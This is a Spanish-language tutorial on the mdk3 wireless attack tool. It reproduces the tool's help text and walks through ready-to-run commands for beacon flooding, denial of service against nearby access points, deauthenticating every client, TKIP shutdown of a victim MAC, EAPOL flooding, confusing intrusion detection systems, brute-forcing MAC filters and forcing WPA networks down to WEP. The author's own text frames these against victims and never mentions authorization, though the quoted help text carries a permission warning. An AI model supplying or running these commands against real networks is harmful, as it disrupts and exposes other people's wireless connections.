mdk3

Hola amigos:

En este post, os presento mdk3, un paquete que nos permitirá distintos tipos de ataques Wifi.

En primer lugar, deberemos instalar (si no lo tenemos ya) el paquete (no necesario en Kali-Linux).

Apt-get install mdk3

Si ponemos mdk3, nos sale la ayuda.

MDK 3.0 v6 - "Yeah, well, whatever"

by ASPj of k2wrlz, using the osdep library from aircrack-ng

And with lots of help from the great aircrack-ng community:

Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,

telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik

THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.

IMPORTANT: It is your responsibility to make sure you have permission from the

network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:

mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options

Try mdk3 --help <test_mode> for info about one test only

TEST MODES:

b - Beacon Flood Mode

Sends beacon frames to show fake APs at clients.

This can sometimes crash network scanners and even drivers!

a - Authentication DoS mode

Sends authentication frames to all APs found in range.

Too much clients freeze or reset some APs.

p - Basic probing and ESSID Bruteforce mode

Probes AP and check for answer, useful for checking if SSID has

been correctly decloaked or if AP is in your adaptors sending range

SSID Bruteforcing is also possible with this test mode.

d - Deauthentication / Disassociation Amok Mode

Kicks everybody found from AP

m - Michael shutdown exploitation (TKIP)

Cancels all traffic continuously

x - 802.1X tests

w - WIDS/WIPS Confusion

Confuse/Abuse Intrusion Detection and Prevention Systems

f - MAC filter bruteforce mode

This test uses a list of known client MAC Addresses and tries to

authenticate them to the given AP while dynamically changing

its response timeout for best performance. It currently works only

on APs who deny an open authentication request properly

g - WPA Downgrade test

deauthenticates Stations and APs sending WPA encrypted packets.

With this test you can check if the sysadmin will try setting his

network to WEP or disable encryption.

Para poder trabajar con ellas, debemos poner la tarjeta en modo monitor.

airmon-ng start wlan0

mdk3 wlan0mon b → Nos crea un montón de AP falsos, que serán visibles en los disositivos móviles que estén alrededor. De esa manera, cuando alguien cercano quiera conectarse a un punto de acceso, la lista de redes wifi será muy grande y le será dificil encontrarlo.

Mdk3 wlan0mon a → Intenta hacer un DoS a todos los AP cercanos, simulando un montón de clientes que se quieren conectar a ellos.

mdk3 wlan0mon p -b -c canal -t mac -s paquetes_por_segundo → realiza fuerza bruta, buscando routers ocultos.

También podemos elegir un nombre SSID.

mdk3 wlan0mon d → Deautentifica a todo el mundo.

mdk3 wlan0mon m -t mac_victima → deautentifica a la mac especificada.

mdk3 wlan0mon x → Realiza test del protocolo 802.1x Las opciones son las siguientes:

x - 802.1X tests

0 - EAPOL Start packet flooding

-n <ssid>

Use SSID <ssid>

-t <bssid>

Set MAC address of target AP

-w <WPA type>

Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)

-u <unicast cipher>

Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)

-m <multicast cipher>

Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)

-s <pps>

Set speed (Default: 400)

1 - EAPOL Logoff test

-t <bssid>

Set MAC address of target AP

-c <bssid>

Set MAC address of target STA

-s <pps>

Set speed (Default: 400)

mdk3 wlan0mon w → Provoca confusión entre los WIDS y los WIPS (sistemas de detección de intrusos por wifi.

Las opciones son las siguientes:

-e <SSID>

SSID of target WDS network

-c [chan,chan,chan...]

Use channel hopping

-z

activate Zero_Chaos' WIDS exploit

(authenticates clients from a WDS to foreign APs to make WIDS go nuts)

mdk3 wlan0mon f -t lista_mac → Prueba la lista de macs, por fuerza bruta, para poder saltarse el filtro mac de un AP.

mdk3 wlan0mon g -t mac_ap_victima → Intenta, a través de denegación de servicio, que un router con seguridad WPA, descienda a seguridad WEP